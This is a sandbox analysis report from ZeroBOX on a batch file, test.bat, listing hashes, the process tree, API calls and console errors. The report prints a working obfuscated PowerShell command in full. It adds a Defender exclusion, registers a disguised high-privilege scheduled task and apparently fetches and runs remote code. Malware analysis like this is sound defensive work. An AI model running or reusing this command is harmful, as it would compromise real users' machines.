popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

test.bat

Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P Hide_URL DGA Http API FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential AntiDebug AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 July 7, 2023, 9:21 a.m. July 7, 2023, 9:23 a.m.
Size 2.3KB
Type ASCII text, with very long lines, with no line terminators
MD5 685ff5bdb3116347994c34f5a72cf6ce
SHA256 6775ce8903370589789ae35e95bec8f8bf815c69d4878e2c8a6786c4a56b225c
CRC32 0E8206FC
ssdeep 48:eq4qszCZAntvHkCHTNMUcSQobWcfxMPsKYoGb5ZtSLledaVYinqaz+f:ezmZAntPdZLuowhYoqYAPcW
Yara None matched

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "afiBgqQhAnHnJC" C:\Users\test22\AppData\Local\Temp\test.bat

    2572

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\test.bat

      2644

      • powershell.exe powershell -ep bypass -w hidden -nop -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADsADQAKACQATABpAG4AawBPAG4AZQBSACAAPQAgACcASgBBAEIATQBBAEcAawBBAGIAZwBCAHIAQQBFAGsAQQBSAFEAQgBZAEEAQwBBAEEAUABRAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAGMAZwBCAGwAQQBHAE0AQQBiAHcAQgAyAEEARwBJAEEAWQBRAEIAegBBAEcAVQBBAEwAZwBCADAAQQBHADgAQQBjAEEAQQBuAEEARABzAEEARABRAEEASwBBAEMAUQBBAFEAdwBBADkAQQBHAGsAQQBkAHcAQgB5AEEAQwBBAEEASgBBAEIATQBBAEcAawBBAGIAZwBCAHIAQQBFAGsAQQBSAFEAQgBZAEEAQwBBAEEATABRAEIAVgBBAEgATQBBAFIAUQBCAEMAQQBHAEUAQQBVAHcAQgBKAEEARwBNAEEAVQBBAEIAQgBBAEgASQBBAGMAdwBCAHAAQQBFADQAQQBaAHcAQQBnAEEASAB3AEEAYQBRAEIAbABBAEgAZwBBAE8AdwBBAD0AJwA7AA0ACgAkAFQAIAA9ACAARwBlAHQALQBEAGEAdABlADsADQAKACQAVAAxACAAPQAgACQAVAAuAEEAZABkAE0AaQBuAHUAdABlAHMAKAA4ACkAOwANAAoAJABUAFIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdAAgACQAVAAxACAALQBEAGEAaQBsAHkADQAKACQAUABTACAAPQAgACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACIAXABTAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAOwANAAoAJABBACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACQAUABTACAALQBBAHIAZwB1AG0AZQBuAHQAIAAiAC0AZQBwACAAYgB5AHAAYQBzAHMAIAAtAHcAIABoAGkAZABkAGUAbgAgAC0AbgBvAHAAIAAtAGUAbgBjACAAJABMAGkAbgBrAE8AbgBlAFIAIgA7AA0ACgAkAFAAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFAAcgBpAG4AYwBpAHAAYQBsACAALQBVAHMAZQByACAAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQAgAC0ATABvAGcAbwBuAFQAeQBwAGUAIABTADQAVQAgAC0AUgB1AG4ATABlAHYAZQBsACAASABpAGcAaABlAHMAdAANAAoAJABTACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAE0AdQBsAHQAaQBwAGwAZQBJAG4AcwB0AGEAbgBjAGUAcwAgAFAAYQByAGEAbABsAGUAbAANAAoAJABUAE4AIAA9ACAAIgBHAEQAcgBpAHYAZQAgAEIAYQBjAGsAdQBwACAAUwB5AG4AYwAiADsADQAKAFUAbgByAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAFQATgAgAC0AQwBvAG4AZgBpAHIAbQA6ACQARgBhAGwAcwBlADsADQAKAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACQAVABOACAALQBUAHIAaQBnAGcAZQByACAAJABUAFIAIAAtAEEAYwB0AGkAbwBuACAAJABBACAALQBTAGUAdAB0AGkAbgBnAHMAIAAkAFMAIAAtAFAAcgBpAG4AYwBpAHAAYQBsACAAJABQADsA

        2732

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: powershell
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: -ep bypass -w hidden -nop -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADsADQAKACQATABpAG4AawBPAG4AZQBSACAAPQAgACcASgBBAEIATQBBAEcAawBBAGIAZwBCAHIAQQBFAGsAQQBSAFEAQgBZAEEAQwBBAEEAUABRAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAGMAZwBCAGwAQQBHAE0AQQBiAHcAQgAyAEEARwBJAEEAWQBRAEIAegBBAEcAVQBBAEwAZwBCADAAQQBHADgAQQBjAEEAQQBuAEEARABzAEEARABRAEEASwBBAEMAUQBBAFEAdwBBADkAQQBHAGsAQQBkAHcAQgB5AEEAQwBBAEEASgBBAEIATQBBAEcAawBBAGIAZwBCAHIAQQBFAGsAQQBSAFEAQgBZAEEAQwBBAEEATABRAEIAVgBBAEgATQBBAFIAUQBCAEMAQQBHAEUAQQBVAHcAQgBKAEEARwBNAEEAVQBBAEIAQgBBAEgASQBBAGMAdwBCAHAAQQBFADQAQQBaAHcAQQBnAEEASAB3AEEAYQBRAEIAbABBAEgAZwBBAE8AdwBBAD0AJwA7AA0ACgAkAFQAIAA9ACAARwBlAHQALQBEAGEAdABlADsADQAKACQAVAAxACAAPQAgACQAVAAuAEEAZABkAE0AaQBuAHUAdABlAHMAKAA4ACkAOwANAAoAJABUAFIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdAAgACQAVAAxACAALQBEAGEAaQBsAHkADQAKACQAUABTACAAPQAgACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACIAXABTAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAOwANAAoAJABBACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACQAUABTACAALQBBAHIAZwB1AG0AZQBuAHQAIAAiAC0AZQBwACAAYgB5AHAAYQBzAHMAIAAtAHcAIABoAGkAZABkAGUAbgAgAC0AbgBvAHAAIAAtAGUAbgBjACAAJABMAGkAbgBrAE8AbgBlAFIAIgA7AA0ACgAkAFAAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFAAcgBpAG4AYwBpAHAAYQBsACAALQBVAHMAZQByACAAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQAgAC0ATABvAGcAbwBuAFQAeQBwAGUAIABTADQAVQAgAC0AUgB1AG4ATABlAHYAZQBsACAASABpAGcAaABlAHMAdAANAAoAJABTACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAE0AdQBsAHQAaQBwAGwAZQBJAG4AcwB0AGEAbgBjAGUAcwAgAFAAYQByAGEAbABsAGUAbAANAAoAJABUAE4AIAA9ACAAIgBHAEQAcgBpAHYAZQAgAEIAYQBjAGsAdQBwACAAUwB5AG4AYwAiADsADQAKAFUAbgByAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAFQATgAgAC0AQwBvAG4AZgBpAHIAbQA6ACQARgBhAGwAcwBlADsADQAKAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACQAVABOACAALQBUAHIAaQBnAGcAZQByACAAJABUAFIAIAAtAEEAYwB0AGkAbwBuACAAJABBACAALQBTAGUAdAB0AGkAbgBnAHMAIAAkAFMAIAAtAFAAcgBpAG4AYwBpAHAAYQBsACAAJABQADsA
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:17
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + Add-MpPreference <<<< -ExclusionPath $env:userprofile;
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: mmandNotFoundException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: The term 'New-ScheduledTaskTrigger' is not recognized as the name of a cmdlet,
console_handle: 0x00000097
1 1 0

WriteConsoleW

 buffer: function, script file, or operable program. Check the spelling of the name, or
console_handle: 0x000000a3
1 1 0

WriteConsoleW

 buffer: if a path was included, verify that the path is correct and try again.
console_handle: 0x000000af
1 1 0

WriteConsoleW

 buffer: At line:6 char:31
console_handle: 0x000000bb
1 1 0

WriteConsoleW

 buffer: + $TR = New-ScheduledTaskTrigger <<<< -At $T1 -Daily
console_handle: 0x000000c7
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (New-ScheduledTaskTrigger:String
console_handle: 0x000000d3
1 1 0

WriteConsoleW

 buffer: ) [], CommandNotFoundException
console_handle: 0x000000df
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x000000eb
1 1 0

WriteConsoleW

 buffer: The term 'New-ScheduledTaskAction' is not recognized as the name of a cmdlet, f
console_handle: 0x0000010b
1 1 0

WriteConsoleW

 buffer: unction, script file, or operable program. Check the spelling of the name, or i
console_handle: 0x00000117
1 1 0

WriteConsoleW

 buffer: f a path was included, verify that the path is correct and try again.
console_handle: 0x00000123
1 1 0

WriteConsoleW

 buffer: At line:8 char:29
console_handle: 0x0000012f
1 1 0

WriteConsoleW

 buffer: + $A = New-ScheduledTaskAction <<<< -Execute $PS -Argument "-ep bypass -w hidd
console_handle: 0x0000013b
1 1 0

WriteConsoleW

 buffer: en -nop -enc $LinkOneR";
console_handle: 0x00000147
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (New-ScheduledTaskAction:String)
console_handle: 0x00000153
1 1 0

WriteConsoleW

 buffer: [], CommandNotFoundException
console_handle: 0x0000015f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x0000016b
1 1 0

WriteConsoleW

 buffer: The term 'New-ScheduledTaskPrincipal' is not recognized as the name of a cmdlet
console_handle: 0x0000018b
1 1 0

WriteConsoleW

 buffer: , function, script file, or operable program. Check the spelling of the name, o
console_handle: 0x00000197
1 1 0

WriteConsoleW

 buffer: r if a path was included, verify that the path is correct and try again.
console_handle: 0x000001a3
1 1 0

WriteConsoleW

 buffer: At line:9 char:32
console_handle: 0x000001af
1 1 0

WriteConsoleW

 buffer: + $P = New-ScheduledTaskPrincipal <<<< -User $env:UserName -LogonType S4U -Run
console_handle: 0x000001bb
1 1 0

WriteConsoleW

 buffer: Level Highest
console_handle: 0x000001c7
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (New-ScheduledTaskPrincipal:Stri
console_handle: 0x000001d3
1 1 0

WriteConsoleW

 buffer: ng) [], CommandNotFoundException
console_handle: 0x000001df
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x000001eb
1 1 0

WriteConsoleW

 buffer: The term 'New-ScheduledTaskSettingsSet' is not recognized as the name of a cmdl
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: et, function, script file, or operable program. Check the spelling of the name,
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: or if a path was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:10 char:34
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + $S = New-ScheduledTaskSettingsSet <<<< -MultipleInstances Parallel
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (New-ScheduledTaskSettingsSet:St
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: ring) [], CommandNotFoundException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: The term 'Unregister-ScheduledTask' is not recognized as the name of a cmdlet,
console_handle: 0x00000097
1 1 0

WriteConsoleW

 buffer: function, script file, or operable program. Check the spelling of the name, or
console_handle: 0x000000a3
1 1 0

WriteConsoleW

 buffer: if a path was included, verify that the path is correct and try again.
console_handle: 0x000000af
1 1 0

WriteConsoleW

 buffer: At line:12 char:25
console_handle: 0x000000bb
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584390
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00583f50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00583f50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00583f50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584090
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00584d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a40000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01d7a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01d72000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01d82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c31000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c32000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f0a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01d83000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01d84000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01d7b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f15000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01d85000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f0c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02980000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01d86000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f03000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f04000
